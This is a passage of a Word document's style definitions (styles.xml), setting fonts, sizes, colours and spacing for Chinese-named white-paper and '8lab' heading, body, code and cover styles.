      <w:sz w:val="21"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-5Char">
    <w:name w:val="8lab-5级标题 Char"/>
    <w:basedOn w:val="5Char"/>
    <w:link w:val="8lab-5"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="宋体" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-5-">
    <w:name w:val="白皮书-5-正文"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="280"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-1">
    <w:name w:val="白皮书-1级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="320" w:after="320"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="12"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-2">
    <w:name w:val="白皮书-2级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-3">
    <w:name w:val="白皮书-3级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-4">
    <w:name w:val="白皮书-4级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-6-">
    <w:name w:val="白皮书-6-论点"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-8-">
    <w:name w:val="白皮书-8-图例"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="200" w:after="200"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="91BDC9"/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-A">
    <w:name w:val="白皮书-论点A"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="780"/>
      </w:tabs>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="40"/>
      <w:ind w:left="780" w:hanging="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Han Sans CN Medium" w:eastAsia="Source Han Sans CN Medium" w:hAnsi="Times New Roman" w:cs="Source Han Sans CN Medium"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>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f5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="200"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="微软雅黑" w:hAnsi="Tahoma" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Chara">
    <w:name w:val="Char"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char4">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="题注 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLChar">
    <w:name w:val="HTML 预设格式 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="批注文字 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-">
    <w:name w:val="8lab-表标题"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="8lab-Char"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char">
    <w:name w:val="8lab-表标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-0">
    <w:name w:val="8lab-正文"/>
    <w:basedOn w:val="-5-"/>
    <w:link w:val="8lab-Char0"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char0">
    <w:name w:val="8lab-正文 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-0"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-6">
    <w:name w:val="8lab-超链接"/>
    <w:basedOn w:val="8lab-0"/>
    <w:link w:val="8lab-Char1"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1C7DCE"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char1">
    <w:name w:val="8lab-超链接 Char"/>
    <w:basedOn w:val="8lab-Char0"/>
    <w:link w:val="8lab-6"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="1C7DCE"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-7">
    <w:name w:val="8lab-代码"/>
    <w:basedOn w:val="8lab-0"/>
    <w:link w:val="8lab-Char2"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char2">
    <w:name w:val="8lab-代码 Char"/>
    <w:basedOn w:val="8lab-Char0"/>
    <w:link w:val="8lab-7"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-8">
    <w:name w:val="8lab-封面信息"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="8lab-Char3"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char3">
    <w:name w:val="8lab-封面信息 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-8"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-9">
    <w:name w:val="8lab-列举"/>
    <w:basedOn w:val="8lab-0"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:afterLines="50" w:after="50"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-a">
    <w:name w:val="8lab-目录标题"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="8lab-Char4"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char4">
    <w:name w:val="8lab-目录标题 Char"/>
    <w:basedOn w:val="1Char"/>
    <w:link w:val="8lab-a"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-b">
    <w:name w:val="8lab-图标题"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="8lab-Char5"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char9">
    <w:name w:val="批注主题 Char"/>
    <w:basedOn w:val="Char2"/>
    <w:link w:val="af"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char5">
    <w:name w:val="8lab-图标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-b"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-c">
    <w:name w:val="8lab-图样式"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="8lab-Char6"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after="100"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="18"/>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Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>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font8">
    <w:name w:val="font8"/>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font9">
    <w:name w:val="font9"/>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left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>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color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>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Cs w:val="21"/>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ourier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="4444CC"/>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Cs w:val="21"/>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kern w:val="0"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:left="300"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="4444CC"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af6">
    <w:name w:val="表列头"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0">
    <w:name w:val="表  0 字符"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="configmarkupelementdesc">
    <w:name w:val="configmarkupelementdesc"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:left="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af7">
    <w:name w:val="说明文字"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="b1">
    <w:name w:val="b1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m1">
    <w:name w:val="m1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pi1">
    <w:name w:val="pi1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="t1">
    <w:name w:val="t1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="990000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char6">
    <w:name w:val="8lab-图样式 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-c"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-d">
    <w:name w:val="8lab-文档封面标题"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="8lab-Char7"/>
    <w:qFormat/>
    <w:rsid w:val="001F0910"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char7">
    <w:name w:val="8lab-文档封面标题 Char"/>
    <w:basedOn w:val="Char8"/>
    <w:link w:val="8lab-d"/>
    <w:qFormat/>
    <w:rsid w:val="001F0910"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-e">
    <w:name w:val="8lab-注意事项"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="8lab-Char8"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:afterLines="100" w:after="100" w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char7">
    <w:name w:val="脚注文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="css-7yxqiz">
    <w:name w:val="css-7yxqiz"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="css-wazei9">
    <w:name w:val="css-wazei9"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="css-35ezg3">
    <w:name w:val="css-35ezg3"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="日期 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="列表段落1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="200"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="微软雅黑" w:hAnsi="Tahoma" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="无间隔1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="微软雅黑" w:hAnsi="Tahoma"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="正文缩进 Char"/>
    <w:link w:val="a3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="未处理的提及2"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC10">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1">
    <w:name w:val="未处理的提及3"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="未处理的提及4"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="未处理的提及5"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
